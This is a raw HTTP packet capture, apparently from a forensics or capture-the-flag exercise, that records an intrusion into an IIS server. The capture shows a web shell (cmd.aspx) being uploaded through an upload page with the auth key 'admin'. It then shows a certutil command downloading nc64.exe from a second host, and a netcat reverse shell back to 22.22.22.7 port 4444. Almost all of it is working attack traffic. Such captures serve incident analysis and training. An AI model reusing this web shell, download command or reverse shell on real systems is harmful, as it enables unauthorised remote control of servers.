TCP Stream 0
GET / HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sun, 01 Nov 2020 15:24:57 GMT
If-None-Match: "8a9fd02763b0d61:0"
HTTP/1.1 304 Not Modified
Last-Modified: Sun, 01 Nov 2020 15:24:57 GMT
Accept-Ranges: bytes
ETag: "8a9fd02763b0d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:11 GMT
GET /welcome.png HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://22.22.22.5/
If-Modified-Since: Sun, 01 Nov 2020 15:24:57 GMT
If-None-Match: "ecbe62763b0d61:0"
HTTP/1.1 304 Not Modified
Last-Modified: Sun, 01 Nov 2020 15:24:57 GMT
Accept-Ranges: bytes
ETag: "ecbe62763b0d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:11 GMT
GET /upload.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:26 GMT
Content-Length: 591
<html>
<head>
<title>filesystembrowser</title>
<style type="text/css"><!--
body,table,p,pre,form input,form select {
font-family: "Lucida Console", monospace;
font-size: 88%;
}
-->
</style></head>
<body>
<form enctype="multipart/form-data" action="?operation=upload" method="post"><br>Auth Key: <input type="text" name="authKey"><br><br>Please specify a file: <input type="file" name="file"></br><div><input type="submit" value="Send"></div></form></body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
POST /upload.aspx?operation=upload HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------240279915540934710361858528148
Content-Length: 1899
Origin: http://22.22.22.5
Connection: keep-alive
Referer: http://22.22.22.5/upload.aspx
Upgrade-Insecure-Requests: 1
-----------------------------240279915540934710361858528148
Content-Disposition: form-data; name="authKey"
admin
-----------------------------240279915540934710361858528148
Content-Disposition: form-data; name="file"; filename="cmd.aspx"
Content-Type: application/octet-stream
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
-----------------------------240279915540934710361858528148--
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:35 GMT
Content-Length: 360
<html>
<head>
<title>filesystembrowser</title>
<style type="text/css"><!--
body,table,p,pre,form input,form select {
font-family: "Lucida Console", monospace;
font-size: 88%;
}
-->
</style></head>
<body>
File uploaded</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cmd.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:42 GMT
Content-Length: 917
<html>
<body>
<form name="ctl00" method="post" action="cmd.aspx" id="ctl00">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTk5MjkzMTA5MWRkwVojPOuktGOWqG0pwsyOK2JElGI=" />
</div>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBAKI2YrhDgL71d7YCAKRuYD5CALT/r7ABAPkkpTQLNd7HWr8RlrYcnI0Hcmr" />
</div>
<p><span id="L_p" style="display:inline-block;width:80px;">Program</span>
<input name="xpath" type="text" value="c:\windows\system32\cmd.exe" id="xpath" style="width:300px;" />
<p><span id="L_a" style="display:inline-block;width:80px;">Arguments</span>
<input name="xcmd" type="text" value="/c net user" id="xcmd" style="width:300px;" />
<p><input type="submit" name="Button" value="Run" id="Button" style="width:100px;" />
<p><span id="result"></span>
</form>
</body>
</html>
POST /cmd.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 313
Origin: http://22.22.22.5
Connection: keep-alive
Referer: http://22.22.22.5/cmd.aspx
Upgrade-Insecure-Requests: 1
__VIEWSTATE=%2FwEPDwUKLTk5MjkzMTA5MWRkwVojPOuktGOWqG0pwsyOK2JElGI%3D&__EVENTVALIDATION=%2FwEWBAKI2YrhDgL71d7YCAKRuYD5CALT%2Fr7ABAPkkpTQLNd7HWr8RlrYcnI0Hcmr&xpath=c%3A%5Cwindows%5Csystem32%5Ccmd.exe&xcmd=%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F22.22.22.7%2Fnc64.exe+c%3A%5Cusers%5Cpublic%5Cnc.exe&Button=Run
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:21:42 GMT
Content-Length: 1270
<html>
<body>
<form name="ctl00" method="post" action="cmd.aspx" id="ctl00">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTk5MjkzMTA5MQ9kFgICAQ9kFgICCw8PFgIeBFRleHQFaw0KPHByZT4qKioqICBPbmxpbmUgICoqKioNCiAgMDAwMCAgLi4uDQogIGIwZDgNCkNlcnRVdGlsOiAtVVJMQ2FjaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KPC9wcmU+ZGRk8LGROcfmxzGiIEGxxlI6IHeRdyA=" />
</div>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBAKQ5ISyAgL71d7YCAKRuYD5CALT/r7ABJjJbr/u6tvYS9iG9x2jvQ+MU8CJ" />
</div>
<p><span id="L_p" style="display:inline-block;width:80px;">Program</span>
<input name="xpath" type="text" value="c:\windows\system32\cmd.exe" id="xpath" style="width:300px;" />
<p><span id="L_a" style="display:inline-block;width:80px;">Arguments</span>
<input name="xcmd" type="text" value="/c certutil -urlcache -split -f http://22.22.22.7/nc64.exe c:\users\public\nc.exe" id="xcmd" style="width:300px;" />
<p><input type="submit" name="Button" value="Run" id="Button" style="width:100px;" />
<p><span id="result">
<pre>**** Online ****
0000 ...
b0d8
CertUtil: -URLCache command completed successfully.
</pre></span>
</form>
</body>
</html>
POST /cmd.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 458
Origin: http://22.22.22.5
Connection: keep-alive
Referer: http://22.22.22.5/cmd.aspx
Upgrade-Insecure-Requests: 1
__VIEWSTATE=%2FwEPDwUKLTk5MjkzMTA5MQ9kFgICAQ9kFgICCw8PFgIeBFRleHQFaw0KPHByZT4qKioqICBPbmxpbmUgICoqKioNCiAgMDAwMCAgLi4uDQogIGIwZDgNCkNlcnRVdGlsOiAtVVJMQ2FjaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KPC9wcmU%2BZGRk8LGROcfmxzGiIEGxxlI6IHeRdyA%3D&__EVENTVALIDATION=%2FwEWBAKQ5ISyAgL71d7YCAKRuYD5CALT%2Fr7ABJjJbr%2Fu6tvYS9iG9x2jvQ%2BMU8CJ&xpath=c%3A%5Cwindows%5Csystem32%5Ccmd.exe&xcmd=%2Fc+c%3A%5Cusers%5Cpublic%5Cnc.exe+22.22.22.7+4444+-e+cmd.exe&Button=Run